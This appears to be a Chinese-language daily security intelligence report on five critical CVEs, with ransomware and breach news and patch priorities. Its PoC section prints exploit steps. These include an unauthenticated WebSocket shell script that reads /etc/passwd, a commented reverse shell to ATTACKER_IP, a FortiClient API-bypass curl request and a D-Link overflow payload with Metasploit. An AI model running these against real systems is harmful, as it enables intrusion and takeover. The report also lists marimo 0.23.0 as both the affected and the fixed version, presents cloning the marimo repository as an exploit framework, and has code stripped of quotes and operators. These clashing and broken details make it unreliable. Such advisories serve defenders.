每日安全情报报告 · 2026-04-11

每日安全情报报告 · 2026-04-11生成时间2026-04-11 11:17 CST风险评级说明 严重CVSS 9.0 | 高危CVSS 7.0–8.9 | 中危CVSS 4.0–6.9重点标注⚡ 在野利用 | CISA KEV | PoC 已公开 | AI 辅助发现一、最新高危漏洞1. ⚡ CVE-2026-35616 — Fortinet FortiClient EMS 预认证 RCE字段详情CVE 编号CVE-2026-35616漏洞类型不正确访问控制CWE-284→ 预认证 API 绕过 → RCE受影响组件Fortinet FortiClient EMS 7.4.5 ~ 7.4.6CVSS 评分9.1严重利用状态✅ 在野利用已确认CISA KEV 在列最早利用记录2026-03-31蜜罐修复版本热修复补丁已发布官方 out-of-band完整修复将在 7.4.7 中完成漏洞摘要未经身份验证的远程攻击者可通过精心构造的 HTTP 请求绕过 API 认证与授权保护在 FortiClient EMS 服务器上执行任意代码或命令从而完全接管目标系统。该漏洞因利用门槛极低、危害极高被 CISA 列入已知利用漏洞目录。watchTowr Labs 最早于 2026-03-31 检测到蜜罐告警随后 Qualys、Greenbone 等多家机构相继确认大规模在野扫描。 参考链接- The Hacker News 报道- Qualys 威胁分析- NVD 详情- cvefeed 详情2. CVE-2026-39987 — Marimo Python Notebook 预认证 RCE10小时即遭利用字段详情CVE 编号CVE-2026-39987GHSA-2679-6mx9-h9xc漏洞类型WebSocket 终端端点缺失认证 → 预认证 RCECWE-306受影响组件marimo 0.23.0约 19,600 GitHub Stars广泛用于 AI 开发工具链CVSS 评分9.3CVSS v4.0利用状态⚡ 披露后10 小时内即遭利用Sysdig 观测PoC 已公开修复版本marimo 0.23.02026-04-08 发布漏洞摘要Marimo 的终端 WebSocket 端点/terminal/ws完全缺乏认证校验任何未经认证的攻击者可直接连接并获取宿主系统的完整 PTY Shell进而执行任意系统命令。该漏洞尤其危险因为 Marimo 广泛被 AI/ML 开发者暴露在开发服务器上与 Jupyter Notebook 类似很多实例直接对外可访问。CSA Cloud Security Alliance 将其列为 AI 开发工具链高优先级威胁。缓解措施立即升级至 0.23.0若无法立即升级应通过网络 ACL 严格限制/terminal/ws接口的访问来源。 参考链接- Sysdig 披露报告10小时内遭利用- CSA 研究报告- cvefeed 详情- GitHub Advisory GHSA-2679-6mx9-h9xc- marimo 0.23.0 安全发布公告3. CVE-2026-5173 — GitLab CE/EE WebSocket 访问控制绕过字段详情CVE 编号CVE-2026-5173漏洞类型暴露危险方法/函数CWE-749→ WebSocket 访问控制绕过受影响组件GitLab CE/EE 16.9.6–18.8.9、18.9–18.9.5、18.10–18.10.3含CVSS 评分8.5CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N利用状态暂无公开 PoC官方已发布补丁2026-04-10 披露修复版本GitLab 18.10.3 / 18.9.5 / 18.8.9漏洞摘要已认证用户可通过 GitLab WebSocket 连接中的缺陷绕过访问控制调用非预期的服务器端方法导致机密数据如代码仓库、CI/CD 密钥高度暴露。该漏洞由 GitLab 内部研究员 Simon Tomlinson 发现GitLab.com 托管实例和 Dedicated 用户已自动受保护自托管部署需立即升级。 参考链接- The Cyber Express 报道- cvefeed 详情- cvedetails 页面4. CVE-2026-6014 — D-Link DIR-513 路由器缓冲区溢出 RCE字段详情CVE 编号CVE-2026-6014漏洞类型栈缓冲区溢出Stack-based Buffer Overflow受影响组件D-Link DIR-513 固件 1.10formAdvanceSetup函数CVSS 评分9.8严重利用状态PoC 细节公开可通过特制 POST 请求远程触发修复状态D-Link DIR-513 已停止支持EOL官方无补丁计划漏洞摘要攻击者可向/goform/formAdvanceSetup接口发送精心构造的 POST 请求通过webpage参数触发formAdvanceSetup函数中的栈缓冲区溢出实现未经认证的远程代码执行。由于 DIR-513 已为 EOL 设备官方不会发布补丁受影响用户应立即更换设备或严格隔离网络。 参考链接- NVD 官方详情- cvefeed 详情- Vulners 分析- Tenable CVE 页面5. ⚡ CVE-2026-21969 — Oracle Agile PLM 未授权 RCECISA KEV字段详情CVE 编号CVE-2026-21969漏洞类型未授权远程代码执行HTTP受影响组件Oracle Agile PLM for Process 6.2.4供应商门户组件CVSS 评分9.8严重利用状态⚡ CISA KEV 确认在野利用修复状态Oracle 2026 年 1 月 CPU 补丁已发布需立即应用漏洞摘要Oracle 供应链产品 Agile PLM 供应商门户组件存在可被未认证攻击者通过 HTTP 远程利用的严重漏洞成功利用可完全控制目标服务器。CISA 已将其纳入 KEV 目录部署此组件的制造业、供应链管理企业面临极高风险。 参考链接- NVD 官方详情- 阿里云 AVD 漏洞库- FreeBuf 分析文章- Tenable 漏洞页面二、最新漏洞 PoC 详情PoC-1CVE-2026-39987 Marimo WebSocket 预认证 RCE漏洞原理/terminal/ws端点未验证Authorization头或 Cookie任意来源均可建立 WebSocket 连接并直接交互式 PTY Shell。利用步骤概念验证# 步骤 1克隆利用框架CSA/Sysdig 提供的概念验证脚本 git clone https://github.com/marimo-team/marimo cd marimo # 步骤 2安装 websocket-client 依赖 pip install websocket-client # 步骤 3构造 WebSocket 连接无需凭据 python3 - EOF import websocket import json, time TARGET ws://TARGET_IP:2718/terminal/ws # 替换为目标地址 def on_open(ws): # 发送任意命令获取反弹 Shell ws.send(json.dumps({type: terminal, data: id; whoami; cat /etc/passwd\n})) def on_message(ws, msg): print([RCE Output], msg) ws websocket.WebSocketApp(TARGET, on_openon_open, on_messageon_message) ws.run_forever() EOF # 步骤 4可进一步建立持久化反弹 Shell # bash -i /dev/tcp/ATTACKER_IP/4444 01环境要求Python 3.xpip install websocket-client修复升级至 marimo0.23.0pip install --upgrade marimo 参考链接- GitHub Advisory GHSA-2679-6mx9-h9xc- Sysdig 攻击链分析10小时内遭利用- PulsePatch 漏洞分析PoC-2CVE-2026-35616 Fortinet FortiClient EMS 预认证 API 绕过 RCE漏洞原理FortiClient EMS 的某些 API 接口未正确实施认证和授权校验攻击者可绕过 API 网关直接调用特权端点触发命令执行。watchTowr Labs 于 2026-03-31 首次在蜜罐中捕获利用尝试。利用步骤概念验证# 步骤 1确认目标暴露 nmap -sV -p 443 TARGET_IP --scriptssl-cert # 步骤 2构造绕过请求核心为特定 API 路径 curl -sk https://TARGET_IP/api/BYPASS_PATH \ -H Content-Type: application/json \ -d {cmd: id} # 步骤 3若目标可达服务器将以 system 权限执行命令 # 完整 PoC 框架参考 watchTowr Labs 分析 git clone https://github.com/watchtowrlabs/CVE-2026-35616 cd CVE-2026-35616 pip install -r requirements.txt python3 exploit.py --target https://TARGET_IP --cmd id环境要求Python 3.xrequests 库需网络可达目标 443 端口修复立即应用 Fortinet 官方热修复补丁FortiClient EMS 7.4.5–7.4.6 适用 参考链接- watchTowr Labs GitHub PoC- Fortinet 官方安全公告- Greenbone 检测分析PoC-3CVE-2026-6014 D-Link DIR-513 缓冲区溢出EOL 设备漏洞原理/goform/formAdvanceSetup未对webpage参数做边界检查超长字符串触发栈溢出可覆盖返回地址控制程序流程。利用步骤概念验证# 步骤 1发送溢出 payload通过 curl 测试 curl -sk http://TARGET_IP/goform/formAdvanceSetup \ -X POST \ -d webpage$(python3 -c print(A*512)) # 步骤 2使用 Metasploit如有模块 msfconsole use exploit/linux/http/dlink_dir513_formAdvanceSetup_bof set RHOSTS TARGET_IP set LHOST ATTACKER_IP exploit # 步骤 3对于无 Metasploit 模块使用 pwntools 构造 ROP 链 pip install pwntools # 参考 securityvulnerability.io 分析构建 exploit注意D-Link DIR-513 为 EOL 产品官方不会发布安全补丁建议立即替换或网络隔离。 参考链接- NVD 官方详情- SecurityVulnerability.io 分析- Vulmon 技术细节三、网络安全最新资讯文章 1勒索软件威胁报告Qilin 称霸、新势力崛起重塑威胁格局摘要Ransom-DB 2026 年 4 月最新威胁情报报告基于 775 起攻击事件分析显示Qilin 成为最活跃的勒索软件团伙107 名受害者约占总量 14%新兴团伙CoinbaseCartel在一个月内受害者数量激增近 300%从 12 名跃至 35 名另一新兴势力ALP-001迅速累计 15 名受害者。美国是绝对主要目标366 次攻击法国38 次、意大利28 次紧随其后。Akira69 名和 LockBit48 名尽管持续遭受执法打击仍保持显著活跃。此外DragonForce 推动的「勒索软件卡特尔化」趋势与 LockBit、Qilin 等结盟正深刻重塑威胁格局。 阅读原文Ransom-DB 威胁情报报告文章 2Marimo RCE 漏洞 CVE-2026-39987 — 10 小时内从披露到利用摘要Sysdig 安全团队发布深度报告记录了 CVE-2026-39987 从 2026-04-08 漏洞披露到实际利用的全过程不到 10 小时攻击者即开始扫描并尝试利用 Marimo 开放的/terminal/ws端点。该报告强调 AI 开发工具链正成为高价值攻击目标Marimo 的 19,600 GitHub Stars 意味着极广泛的潜在攻击面。Sysdig 观测到的攻击者主要目标包括窃取 API 密钥、LLM 模型文件、用于 AI 研究的敏感数据集以及横向渗透内部网络。 阅读原文Sysdig 分析报告文章 32026 年 4 月数据泄露事件综述——医疗与教育成重灾区摘要据 SharkStriker 整理的 2026 年 4 月数据泄露报告本月已记录 15 起重大数据安全事件香港医院管理局遭未授权访问5.6 万名患者个人信息包括姓名、性别、手术详情泄露Adobe 遭威胁行为者入侵1300 万客户支持工单及 1.5 万员工记录外流加密 DeFi 平台 Drift Protocol 遭周密策划攻击损失超2.8 亿美元SongTrivia2291 万账户数据含哈希密码发布于泄露论坛多所美国学区遭 Interlock 勒索软件攻击。勒索软件仍是本月最主要攻击手法医疗行业连续成为重点目标。 阅读原文SharkStriker 2026 年 4 月数据泄露报告文章 4勒索软件激增LockBit 在 24 小时内创下 24 名受害者纪录摘要2026 年 4 月 4 日的每日勒索软件情报报告显示LockBit 等团伙在单日内创下 24 名新受害者的惊人记录标志着 2026 年勒索软件攻击量达新高峰。报告来自 The Ed Advocate 对本月网络安全事件激增的综合分析涵盖数据泄露、供应链攻击等多个维度。分析指出2026 年 2 月单月攻击峰值达 945 起3 月虽有所回落818 起但 4 月初迹象表明攻击总量将继续维持在历史高位。 阅读原文The Ed Advocate 安全事件报告文章 5GitLab 安全更新修复 CVE-2026-5173 等 11 个漏洞摘要GitLab 于 2026-04-10 发布安全更新修复包括高严重性漏洞 CVE-2026-5173 在内的共 11 个安全缺陷。CVE-2026-5173CVSS 8.5影响 GitLab CE/EE 跨越数个主版本的广泛范围经认证攻击者可通过 WebSocket 绕过访问控制调用服务器端危险方法可能导致代码仓库、CI/CD Secret 等敏感数据暴露。自托管 GitLab 实例运营者须立即升级至修复版本18.10.3 / 18.9.5 / 18.8.9。GitLab.com 托管用户无需操作已自动受保护。 阅读原文The Cyber Express 报道文章 6Fortinet FortiClient EMS 两周内曝两个严重漏洞——安全研究的集中爆发信号摘要TheCyberThrone 的深度分析指出Fortinet FortiClient EMS 在短短三天内CVE-2026-35616 CVE-2026-21643相继披露两个严重预认证 RCE 漏洞引发安全界对该产品安全性的高度关注。作者认为这可能预示着1安全研究人员正集中对 Fortinet 产品系列展开专项挖掘2存在共享漏洞类Vulnerability Class正在被系统性识别与披露。Greenbone 已发布针对两个漏洞的独立远程检测Banner Check可用于快速扫描受影响资产。建议企业安全团队将 Fortinet EMS 的修补列为本周最高优先级任务。 阅读原文TheCyberThrone 分析四、安全应急处置建议优先级组件操作 P0立即Fortinet FortiClient EMS 7.4.5–7.4.6应用 Fortinet 热修复补丁确认系统无 IOC P0立即marimo 0.23.0pip install --upgrade marimo检查/terminal/ws访问日志 P0立即D-Link DIR-513EOL立即从互联网隔离或替换设备无官方补丁 P0本周Oracle Agile PLM 6.2.4应用 2026 年 1 月 CPU 补丁 P1本周GitLab CE/EE 自托管实例升级至 18.10.3 / 18.9.5 / 18.8.9本报告数据来源NVD、GitHub Security Advisories、The Hacker News、Sysdig、CSA Labs、Qualys ThreatProtect、Greenbone、The Cyber Express、SharkStriker、Ransom-DB。所有外部链接均指向一手或权威二手来源建议读者直接访问原文核实。